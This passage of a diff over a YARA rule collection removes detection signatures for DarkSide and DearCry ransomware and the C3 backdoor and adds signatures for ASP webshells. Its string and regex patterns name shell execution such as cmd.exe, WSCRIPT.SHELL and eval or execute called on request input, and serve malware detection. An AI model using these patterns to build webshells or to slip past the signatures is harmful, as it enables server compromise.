+		$asp_asp = "<asp:" wide ascii
+		$asp_text1 = ".text" wide ascii
+		$asp_text2 = ".Text" wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them or all of ( $op* ) or all of ( $s* )
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( any of ( $asp_input* ) or ( $asp_xml_http and any of ( $asp_xml_method* ) ) or ( any of ( $asp_form* ) and any of ( $asp_text* ) and $asp_asp ) ) and ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) and ( filesize < 400 or ( filesize < 6000 and 1 of ( $sus* ) ) )
 }
-rule SIGNATURE_BASE_MAL_Ransomware_Win_DARKSIDE_V1_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_OBFUSC : FILE
 {
 	meta:
-		description = "Detection for early versions of DARKSIDE ransomware samples based on the encryption mode configuration values."
-		author = "FireEye"
-		id = "322a3de5-a7e5-52b9-8648-6019954e92d7"
-		date = "2021-03-22"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L25-L37"
+		description = "ASP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3960b692-9f6f-52c5-b881-6f9e1b3ac555"
+		date = "2021-01-12"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3093-L3368"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1a700f845849e573ab3148daef1a3b0b"
-		logic_hash = "b3612510bd1f2ca7543e217e97037b02d312bcda2b2df16d9be3216749ea4beb"
+		hash = "ad597eee256de51ffb36518cd5f0f4aa0f254f27517d28fb7543ae313b15e112"
+		hash = "e0d21fdc16e0010b88d0197ebf619faa4aeca65243f545c18e10859469c1805a"
+		hash = "54a5620d4ea42e41beac08d8b1240b642dd6fd7c"
+		hash = "fc44fd7475ee6c0758ace2b17dd41ed7ea75cc73"
+		hash = "be2fedc38fc0c3d1f925310d5156ccf3d80f1432"
+		hash = "3175ee00fc66921ebec2e7ece8aa3296d4275cb5"
+		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
+		hash = "cafc4ede15270ab3f53f007c66e82627a39f4d0f"
+		logic_hash = "96369062f963c3604c05808755fdfca922e5a6da960cb0ee05dee2df72d5d69b"
 		score = 75
-		quality = 85
+		quality = -117
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$consts = { 80 3D [4] 01 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] 00 00 04 00 [1-10] 00 00 00 00 [1-30] 80 3D [4] 02 [1-10] 03 00 00 00 [1-10] 03 00 00 00 [1-10] FF FF FF FF [1-10] FF FF FF FF [1-30] 03 00 00 00 [1-10] 03 00 00 00 }
+		$asp_obf1 = "/*-/*-*/" wide ascii
+		$asp_obf2 = "u\"+\"n\"+\"s" wide ascii
+		$asp_obf3 = "\"e\"+\"v" wide ascii
+		$asp_obf4 = "a\"+\"l\"" wide ascii
+		$asp_obf5 = "\"+\"(\"+\"" wide ascii
+		$asp_obf6 = "q\"+\"u\"" wide ascii
+		$asp_obf7 = "\"u\"+\"e" wide ascii
+		$asp_obf8 = "/*//*/" wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$o4 = "\\x8" wide ascii
+		$o5 = "\\x9" wide ascii
+		$o6 = "\\61" wide ascii
+		$o7 = "\\44" wide ascii
+		$o8 = "\\112" wide ascii
+		$o9 = "\\120" wide ascii
+		$m_multi_one1 = "Replace(" wide ascii
+		$m_multi_one2 = "Len(" wide ascii
+		$m_multi_one3 = "Mid(" wide ascii
+		$m_multi_one4 = "mid(" wide ascii
+		$m_multi_one5 = ".ToString(" wide ascii
+		$m_fp1 = "Author: Andre Teixeira - andret@microsoft.com"
+		$m_fp2 = "DataBinder.Eval(Container.DataItem" ascii wide
+		$oo1 = /\w\"&\"\w/ wide ascii
+		$oo2 = "*/\").Replace(\"/*" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $consts
+		filesize < 100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and ( ( ( filesize < 100KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 5KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 5 or ( ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 3 ) ) ) or ( filesize < 700 and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 3 or ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 2 ) ) ) or any of ( $asp_obf* ) ) or ( ( filesize < 100KB and ( ( #oo1 ) > 2 or $oo2 ) ) or ( filesize < 25KB and ( ( #oo1 ) > 1 ) ) or ( filesize < 1KB and ( ( #oo1 ) > 0 ) ) ) ) and not any of ( $m_fp* )
 }
-rule SIGNATURE_BASE_MAL_Dropper_Win_Darkside_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Eval_On_Input : FILE
 {
 	meta:
-		description = "Detection for on the binary that was used as the dropper leading to DARKSIDE."
-		author = "FireEye"
-		id = "910a581c-25a4-5d5e-acdc-6d87cbedd3cf"
-		date = "2021-05-11"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L39-L56"
+		description = "Generic ASP webshell which uses any eval/exec function directly on user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3370-L3474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "131b3666ae444e0de043eafdf7cfd3324b927d18d8ad56d5004ea09b2da5610e"
+		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
+		hash = "9be2088d5c3bfad9e8dfa2d7d7ba7834030c7407"
+		hash = "a1df4cfb978567c4d1c353e988915c25c19a0e4a"
+		hash = "069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6"
+		logic_hash = "f7b9f43cf2fd6d08b7438f003242e9a19dcea282959c7a1fdff3a35e261a031e"
 		score = 75
-		quality = 79
+		quality = -24
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$CommonDLLs1 = "KERNEL32.dll" fullword
-		$CommonDLLs2 = "USER32.dll" fullword
-		$CommonDLLs3 = "ADVAPI32.dll" fullword
-		$CommonDLLs4 = "ole32.dll" fullword
-		$KeyString1 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 57 69 6E 64 6F 77 73 2E 43 6F 6D 6D 6F 6E 2D 43 6F 6E 74 72 6F 6C 73 22 20 76 65 72 73 69 6F 6E 3D 22 36 2E 30 2E 30 2E 30 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 36 35 39 35 62 36 34 31 34 34 63 63 66 31 64 66 22 }
-		$KeyString2 = { 74 79 70 65 3D 22 77 69 6E 33 32 22 20 6E 61 6D 65 3D 22 4D 69 63 72 6F 73 6F 66 74 2E 56 43 39 30 2E 4D 46 43 22 20 76 65 72 73 69 6F 6E 3D 22 39 2E 30 2E 32 31 30 32 32 2E 38 22 20 70 72 6F 63 65 73 73 6F 72 41 72 63 68 69 74 65 63 74 75 72 65 3D 22 78 38 36 22 20 70 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D 22 31 66 63 38 62 33 62 39 61 31 65 31 38 65 33 62 22 }
-		$Slashes = { 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C }
+		$payload_and_input0 = /\beval_r\s{0,20}\(Request\(/ nocase wide ascii
+		$payload_and_input1 = /\beval[\s\(]{1,20}request[.\(\[]/ nocase wide ascii
+		$payload_and_input2 = /\bexecute[\s\(]{1,20}request\(/ nocase wide ascii
+		$payload_and_input4 = /\bExecuteGlobal\s{1,20}request\(/ nocase wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
 
 	condition:
-		filesize < 2MB and filesize > 500KB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( all of ( $CommonDLLs* ) ) and ( all of ( $KeyString* ) ) and $Slashes
+		( filesize < 1100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $payload_and_input* ) ) or ( filesize < 100 and any of ( $payload_and_input* ) )
 }
-rule SIGNATURE_BASE_MAL_Backdoor_Win_C3_1 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASP_Nano : FILE
 {
 	meta:
-		description = "Detection to identify the Custom Command and Control (C3) binaries."
-		author = "FireEye"
-		id = "60eb022e-6f4e-5c7d-9ddf-b458a593071e"
-		date = "2021-05-11"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_darkside.yar#L58-L77"
+		description = "Generic ASP webshell which uses any eval/exec function"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5f2f24c2-159d-51e1-80d9-11eeb77e8760"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3476-L3667"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7cdac4b82a7573ae825e5edb48f80be5"
-		logic_hash = "369c54b9426edb449004466d30e1010ecefe8cfbea106306eb8eb90b27610dbf"
+		hash = "3b7910a499c603715b083ddb6f881c1a0a3a924d"
+		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
+		hash = "22345e956bce23304f5e8e356c423cee60b0912c"
+		hash = "c84a6098fbd89bd085526b220d0a3f9ab505bcba"
+		hash = "b977c0ad20dc738b5dacda51ec8da718301a75d7"
+		hash = "c69df00b57fd127c7d4e0e2a40d2f6c3056e0af8bfb1925938060b7e0d8c630f"
+		hash = "f3b39a5da1cdde9acde077208e8e5b27feb973514dab7f262c7c6b2f8f11eaa7"
+		hash = "0e9d92807d990144c637d8b081a6a90a74f15c7337522874cf6317092ea2d7c1"
+		hash = "ebbc485e778f8e559ef9c66f55bb01dc4f5dcce9c31ccdd150e2c702c4b5d9e1"
+		hash = "44b4068bfbbb8961e16bae238ad23d181ac9c8e4fcb4b09a66bbcd934d2d39ee"
+		hash = "c5a4e188780b5513f34824904d56bf6e364979af6782417ccc5e5a8a70b4a95a"
+		hash = "41a3cc668517ec207c990078bccfc877e239b12a7ff2abe55ff68352f76e819c"
+		hash = "2faad5944142395794e5e6b90a34a6204412161f45e130aeb9c00eff764f65fc"
+		hash = "d0c5e641120b8ea70a363529843d9f393074c54af87913b3ab635189fb0c84cb"
+		hash = "28cfcfe28419a399c606bf96505bc68d6fe05624dba18306993f9fe0d398fbe1"
+		logic_hash = "1b969e098a0b2c86ceba9cbb7f31770ba04f1a4c225716ea27d7e4e4177c90c4"
 		score = 75
-		quality = 79
+		quality = -117
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$dropboxAPI = "Dropbox-API-Arg"
-		$knownDLLs1 = "WINHTTP.dll" fullword
-		$knownDLLs2 = "SHLWAPI.dll" fullword
-		$knownDLLs3 = "NETAPI32.dll" fullword
-		$knownDLLs4 = "ODBC32.dll" fullword
-		$tokenString1 = { 5B 78 5D 20 65 72 72 6F 72 20 73 65 74 74 69 6E 67 20 74 6F 6B 65 6E }
-		$tokenString2 = { 5B 78 5D 20 65 72 72 6F 72 20 63 72 65 61 74 69 6E 67 20 54 6F 6B 65 6E }
-		$tokenString3 = { 5B 78 5D 20 65 72 72 6F 72 20 64 75 70 6C 69 63 61 74 69 6E 67 20 74 6F 6B 65 6E }
+		$susasp1 = "/*-/*-*/"
+		$susasp2 = "(\"%1"
+		$susasp3 = /[Cc]hr\([Ss]tr\(/
+		$susasp4 = "cmd.exe"
+		$susasp5 = "cmd /c"
+		$susasp7 = "FromBase64String"
+		$susasp8 = "UmVxdWVzdC"
+		$susasp9 = "cmVxdWVzdA"
+		$susasp10 = "/*//*/"
+		$susasp11 = "(\"/*/\""
+		$susasp12 = "eval(eval("
+		$fp1 = "eval a"
+		$fp2 = "'Eval'"
+		$fp3 = "Eval(\""
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		filesize < 5MB and uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and ( ( ( all of ( $knownDLLs* ) ) and ( $dropboxAPI or ( 1 of ( $tokenString* ) ) ) ) or ( all of ( $tokenString* ) ) )
+		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and not any of ( $fp* ) and ( filesize < 200 or ( filesize < 1000 and any of ( $susasp* ) ) )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Crime_Dearcry_Mar2021_1 : FILE
-{
-	meta:
-		description = "Triggers on strings of known DearCry samples"
-		author = "Nils Kuhnert"
-		id = "d9714502-f1ea-5fe8-b0ac-1f7a9a30d8f5"
-		date = "2021-03-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/phillip_misner/status/1370197696280027136"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dearcry_ransom.yar#L1-L27"
+rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded : FILE
+{
+	meta:
+		description = "Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "67c0e1f6-6da5-569c-ab61-8b8607429471"
+		date = "2021-03-14"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3669-L3779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e55507475888087c84f9624f82516e8a40aaf59bf2fbea72129a1dd134b28110"
+		hash = "1bc7327f9d3dbff488e5b0b69a1b39dcb99b3399"
+		hash = "9885ee1952b5ad9f84176c9570ad4f0e32461c92"
+		hash = "27a020c5bc0dbabe889f436271df129627b02196"
+		hash = "f41f8c82b155c3110fc1325e82b9ee92b741028b"
+		hash = "af40f4c36e3723236c59dc02f28a3efb047d67dd"
+		logic_hash = "dc33423874a49edfe9994db50959e6a55e2d475f4cd7d0b1b0a288c4ee1f7961"
 		score = 75
-		quality = 85
+		quality = -24
 		tags = "FILE"
-		hash1 = "2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff"
-		hash2 = "e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6"
-		hash3 = "feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$x1 = ".TIF .TIFF .PDF .XLS .XLSX .XLTM .PS .PPS .PPT .PPTX .DOC .DOCX .LOG .MSG .RTF .TEX .TXT .CAD .WPS .EML .INI .CSS .HTM .HTML  .XHTML .JS .JSP .PHP .KEYCHAIN .PEM .SQL .APK .APP .BAT .CGI .ASPX .CER .CFM .C .CPP .GO .CONFIG .PL .PY .DWG .XML .JPG .BMP .PNG .EXE .DLL .CAD .AVI .H.CSV .DAT .ISO .PST .PGD  .7Z .RAR .ZIP .ZIPX .TAR .PDB .BIN .DB .MDB .MDF .BAK .LOG .EDB .STM .DBF .ORA .GPG .EDB .MFS" ascii
-		$s1 = "create rsa error" ascii fullword
-		$s2 = "DEARCRY!" ascii fullword
-		$s4 = "/readme.txt" ascii fullword
-		$s5 = "msupdate" ascii fullword
-		$s6 = "Your file has been encrypted!" ascii fullword
-		$s7 = "%c:\\%s" ascii fullword
-		$s8 = "C:\\Users\\john\\" ascii
-		$s9 = "EncryptFile.exe.pdb" ascii
+		$encoded1 = "VBScript.Encode" nocase wide ascii
+		$encoded2 = "JScript.Encode" nocase wide ascii
+		$data1 = "#@~^" wide ascii
+		$sus1 = "shell" nocase wide ascii
+		$sus2 = "cmd" fullword wide ascii
+		$sus3 = "password" fullword wide ascii
+		$sus4 = "UserPass" fullword wide ascii
+		$tagasp_short1 = /<%[^"]/ wide ascii
